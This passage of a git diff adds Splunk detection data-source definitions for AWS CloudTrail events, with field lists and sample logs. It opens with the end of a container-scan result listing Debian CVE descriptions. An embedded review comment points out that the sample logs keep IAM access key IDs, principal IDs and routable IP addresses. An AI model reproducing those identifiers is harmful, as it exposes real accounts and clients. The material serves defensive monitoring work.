+ "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2017-14159", "description":
+ "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges
+ to a non-root account, which might allow local users to kill arbitrary processes
+ by leveraging access to this non-root account for PID file modification before a
+ root script executes a \"kill `cat /pathname`\" command, as demonstrated by openldap-initscript.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2017-14159", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"},
+ {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2017-17740", "description":
+ "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops
+ module and the memberof overlay are enabled, attempts to free a buffer that was
+ allocated on the stack, which allows remote attackers to cause a denial of service
+ (slapd crash) via a member MODDN operation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17740",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "5"}]}, {"name": "CVE-2010-0928", "description": "OpenSSL 0.9.8i on the Gaisler
+ Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation
+ (FWE) algorithm for certain signature calculations, and does not verify the signature
+ before providing it to a caller, which makes it easier for physically proximate
+ attackers to determine the private key via a modified supply voltage for the microprocessor,
+ related to a \"fault-based attack.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-0928",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:H/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]},
+ {"name": "CVE-2007-6755", "description": "The NIST SP 800-90A default statement
+ of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm
+ contains point Q constants with a possible relationship to certain \"skeleton key\"
+ values, which might allow context-dependent attackers to defeat cryptographic protection
+ mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary
+ CVE for Dual_EC_DRBG; future research may provide additional details about point
+ Q and associated attacks, and could potentially lead to a RECAST or REJECT of this
+ CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-6755", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"},
+ {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2017-7246", "description":
+ "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c
+ in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE
+ of size 268) or possibly have unspecified other impact via a crafted file.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2017-7246", "severity": "INFORMATIONAL",
+ "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name",
+ "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-20838", "description":
+ "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is
+ disabled, and \\X or \\R has more than one fixed quantifier, a related issue to
+ CVE-2019-20454.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20838",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+ {"name": "CVE-2017-7245", "description": "Stack-based buffer overflow in the pcre32_copy_substring
+ function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause
+ a denial of service (WRITE of size 4) or possibly have unspecified other impact
+ via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7245",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+ {"name": "CVE-2017-16231", "description": "** DISPUTED ** In PCRE 8.41, after compiling,
+ a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c
+ because of a self-recursive call. NOTE: third parties dispute the relevance of this
+ report, noting that there are options that can be used to limit the amount of stack
+ that is used.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16231",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+ {"name": "CVE-2017-11164", "description": "In PCRE 8.41, the OP_KETRMAX feature
+ in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion)
+ when processing a crafted regular expression.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-11164",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.8"}]},
+ {"name": "CVE-2011-4116", "description": "_is_safe in the File::Temp module for
+ Perl does not properly handle symlinks.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-4116",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "5.28.1-6+deb10u1"}, {"key": "package_name", "value": "perl"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2019-19882", "description": "shadow 4.8, in certain circumstances
+ affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain
+ root access because setuid programs are misconfigured. Specifically, this affects
+ shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid,
+ and without a PAM configuration suitable for use with setuid account management
+ tools. This combination leads to account management tools (groupadd, groupdel, groupmod,
+ useradd, userdel, usermod) that can easily be used by unprivileged local users to
+ escalate privileges to root in multiple ways. This issue became much more relevant
+ in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod
+ calls to suidusbins were fixed in the upstream Makefile which is now included in
+ the release version 4.8).", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19882",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.9"}]},
+ {"name": "CVE-2007-5686", "description": "initscripts in rPath Linux 1 sets insecure
+ permissions for the /var/log/btmp file, which allows local users to obtain sensitive
+ information regarding authentication attempts. NOTE: because sshd detects the insecure
+ permissions and does not log certain events, this also prevents sshd from logging
+ failed authentication attempts by remote attackers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-5686",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.9"}]},
+ {"name": "CVE-2013-4235", "description": "shadow: TOCTOU (time-of-check time-of-use)
+ race condition when copying and removing directory trees", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4235",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:M/Au:N/C:N/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.3"}]},
+ {"name": "CVE-2020-13529", "description": "An exploitable denial-of-service vulnerability
+ exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server
+ running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker
+ can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13529", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+ {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:A/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.9"}]}, {"name": "CVE-2013-4392", "description":
+ "systemd, when updating file permissions, allows local users to change the permissions
+ and SELinux security contexts for arbitrary files via a symlink attack on unspecified
+ files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4392", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+ {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13776", "description":
+ "systemd through v245 mishandles numerical usernames such as ones composed of decimal
+ digits or 0x followed by hex digits, as demonstrated by use of root privileges when
+ privileges of the 0x0 user account were intended. NOTE: this issue exists because
+ of an incomplete fix for CVE-2017-1000082.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13776",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.2"}]},
+ {"name": "CVE-2019-20386", "description": "An issue was discovered in button_open
+ in login/logind-button.c in systemd before 243. When executing the udevadm trigger
+ command, a memory leak may occur.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20386",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+ {"name": "CVE-2019-9923", "description": "pax_decode_header in sparse.c in GNU Tar
+ before 1.32 had a NULL pointer dereference when parsing certain archives that have
+ malformed extended headers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9923",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2005-2541", "description": "Tar 1.15.1 does not properly warn the
+ user when extracting setuid or setgid files, which may allow local users or remote
+ attackers to gain privileges.", "uri": "https://security-tracker.debian.org/tracker/CVE-2005-2541",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "10"}]},
+ {"name": "CVE-2021-20193", "description": "A flaw was found in the src/list.c of
+ tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input
+ file to tar to cause uncontrolled consumption of memory. The highest threat from
+ this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-20193",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+ {"name": "CVE-2017-17973", "description": "** DISPUTED ** In LibTIFF 4.0.8, there
+ is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c. NOTE:
+ there is a third-party report of inability to reproduce this issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17973",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "6.8"}]}, {"name": "CVE-2020-35521", "description": "A flaw was found in libtiff.
+ Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to
+ an abort, resulting in denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35521",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "4.3"}]}, {"name": "CVE-2014-8130", "description": "The _TIFFmalloc function in
+ tif_unix.c in LibTIFF 4.0.3 does not reject a zero size, which allows remote attackers
+ to cause a denial of service (divide-by-zero error and application crash) via a
+ crafted TIFF image that is mishandled by the TIFFWriteScanline function in tif_write.c,
+ as demonstrated by tiffdither.", "uri": "https://security-tracker.debian.org/tracker/CVE-2014-8130",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "4.3"}]}, {"name": "CVE-2017-5563", "description": "LibTIFF version 4.0.7 is vulnerable
+ to a heap-based buffer over-read in tif_lzw.c resulting in DoS or code execution
+ via a crafted bmp image to tools/bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-5563",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "6.8"}]}, {"name": "CVE-2020-35522", "description": "In LibTIFF, there is a memory
+ malloc failure in tif_pixarlog.c. A crafted TIFF document can lead to an abort,
+ resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35522",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "4.3"}]}, {"name": "CVE-2017-9117", "description": "In LibTIFF 4.0.7, the program
+ processes BMP images without verifying that biWidth and biHeight in the bitmap-information
+ header match the actual input, leading to a heap-based buffer over-read in bmp2tiff.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9117", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"},
+ {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2017-16232", "description":
+ "** DISPUTED ** LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow
+ attackers to cause a denial of service (memory consumption), as demonstrated by
+ tif_open.c, tif_lzw.c, and tif_aux.c. NOTE: Third parties were unable to reproduce
+ the issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16232",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "5"}]}, {"name": "CVE-2018-10126", "description": "LibTIFF 4.0.9 has a NULL pointer
+ dereference in the jpeg_fdct_16x16 function in jfdctint.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-10126",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "4.3"}]}, {"name": "CVE-2021-22924", "description": "libcurl keeps previously used
+ connections in a connection pool for subsequenttransfers to reuse, if one of them
+ matches the setup.Due to errors in the logic, the config matching function did not
+ take ''issuercert'' into account and it compared the involved paths *case insensitively*,which
+ could lead to libcurl reusing wrong connections.File paths are, or can be, case
+ sensitive on many systems but not all, and caneven vary depending on used file systems.The
+ comparison also didn''t include the ''issuer cert'' which a transfer can setto qualify
+ how to verify the server certificate.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22924",
+ "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"},
+ {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-38115", "description":
+ "read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2
+ allows remote attackers to cause a denial of service (out-of-bounds read) via a
+ crafted TGA file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-38115",
+ "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+ {"key": "package_name", "value": "libgd2"}]}, {"name": "CVE-2021-3618", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3618",
+ "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+ {"key": "package_name", "value": "nginx"}]}], "findingSeverityCounts": {"HIGH":
+ 2, "MEDIUM": 14, "INFORMATIONAL": 63, "LOW": 22, "UNDEFINED": 3}}}, "requestID":
+ "23c19e2d-c48b-4265-b4eb-853e7b325780", "eventID": "6c94a9b2-36dc-43f8-a6dd-4ec839ded8af",
+ "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..27644d074d
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail GetAccountPasswordPolicy
+id: 439bdc53-6e4b-4cd7-b326-86c7317fd396
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDASBMSCQHHTH5NDF4GD", "arn": "arn:aws:iam::111111111111:user/strt_fonder", "accountId":
+ "111111111111", "accessKeyId": "AKIASBMSCQHH5A5NJDM5", "userName": "strt_fonder"},
+ "eventTime": "2023-01-26T22:39:06Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "GetAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+ "userAgent": "aws-cli/2.7.25 Python/3.10.6 Darwin/21.6.0 source/x86_64 prompt/off
+ command/iam.get-account-password-policy", "requestParameters": null, "responseElements":
+ null, "requestID": "098fd0dd-e42e-4249-91fb-9637925bf2fe", "eventID": "5eb0fb9b-18ff-4be9-b90d-107a290e1d5c",
+ "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com"}}'
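Review bot: The `example_log` sample is only partially sanitised: the account ID has been replaced with `111111111111`, but the IAM access key ID `AKIASBMSCQHH5A5NJDM5`, the principal ID `AIDASBMSCQHHTH5NDF4GD` and the routable `sourceIPAddress` `23.93.193.7` are left as recorded, so the event still identifies a real principal and client. Key IDs in the `AKIA`/`ASIA` format are matched by common secret scanners and are likely to be flagged on every clone of this repository even though no secret accompanies them. Replace them with the AWS-documented placeholder `AKIAIOSFODNN7EXAMPLE`, a placeholder principal ID, and an RFC 5737 documentation address such as `192.0.2.10`. The same applies to the access key IDs and source addresses in the GetObject, GetPasswordData, ModifyDBInstance, ModifyImageAttribute, ModifySnapshotAttribute and PutBucketAcl samples further down this diff.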
diff --git a/data_sources/aws_cloudtrail_getobject.yml b/data_sources/aws_cloudtrail_getobject.yml
new file mode 100644
index 0000000000..c7277dc3ab
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getobject.yml
@@ -0,0 +1,113 @@
+name: AWS CloudTrail GetObject
+id: 5063cb10-84c0-44af-ade4-ab9ecad11dfe
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetObject
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.bucketName
+- requestParameters.key
+- requestParameters.x-amz-request-payer
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/console", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "console"}, "eventTime":
+ "2023-04-11T01:18:47Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
+ "awsRegion": "us-west-2", "sourceIPAddress": "12.26.0.38", "userAgent": "[aws-cli/2.11.2
+ Python/3.11.2 Darwin/22.3.0 exe/x86_64 prompt/off command/s3.cp]", "requestParameters":
+ {"bucketName": "security-content", "Host": "security-content.s3.us-west-2.amazonaws.com",
+ "x-amz-request-payer": "requester", "key": "stories/windows_discovery_techniques.yml"},
+ "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod":
+ "AuthHeader", "x-amz-id-2": "dcha0yrujT+O4FHsYxHx48KxMk4+wtO7MaNRwFOFs46R1PynKWcCsbLScYEFytN+Vt35hyq1cek=",
+ "bytesTransferredOut": 1136}, "requestID": "GVSEBM08Z93FB3BT", "eventID": "2b7231c2-892d-464e-8880-1e4f81ae7eb2",
+ "readOnly": true, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::security-content/stories/windows_discovery_techniques.yml"},
+ {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::security-content"}],
+ "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111",
+ "eventCategory": "Data", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "security-content.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_getpassworddata.yml b/data_sources/aws_cloudtrail_getpassworddata.yml
new file mode 100644
index 0000000000..7f2aa377f6
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getpassworddata.yml
@@ -0,0 +1,115 @@
+name: AWS CloudTrail GetPasswordData
+id: 6ff2ce99-85b1-4c17-888a-56dbc3570671
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetPasswordData
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.instanceId
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLP5AASA6I5:aws-go-sdk-1660169051746043000", "arn": "arn:aws:sts::111111111111:assumed-role/sample-role-used-by-stratus-for-ec2-password-data/aws-go-sdk-1660169051746043000",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLLY5RQXEF", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLP5AASA6I5", "arn":
+ "arn:aws:iam::111111111111:role/sample-role-used-by-stratus-for-ec2-password-data",
+ "accountId": "111111111111", "userName": "sample-role-used-by-stratus-for-ec2-password-data"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-10T22:04:12Z",
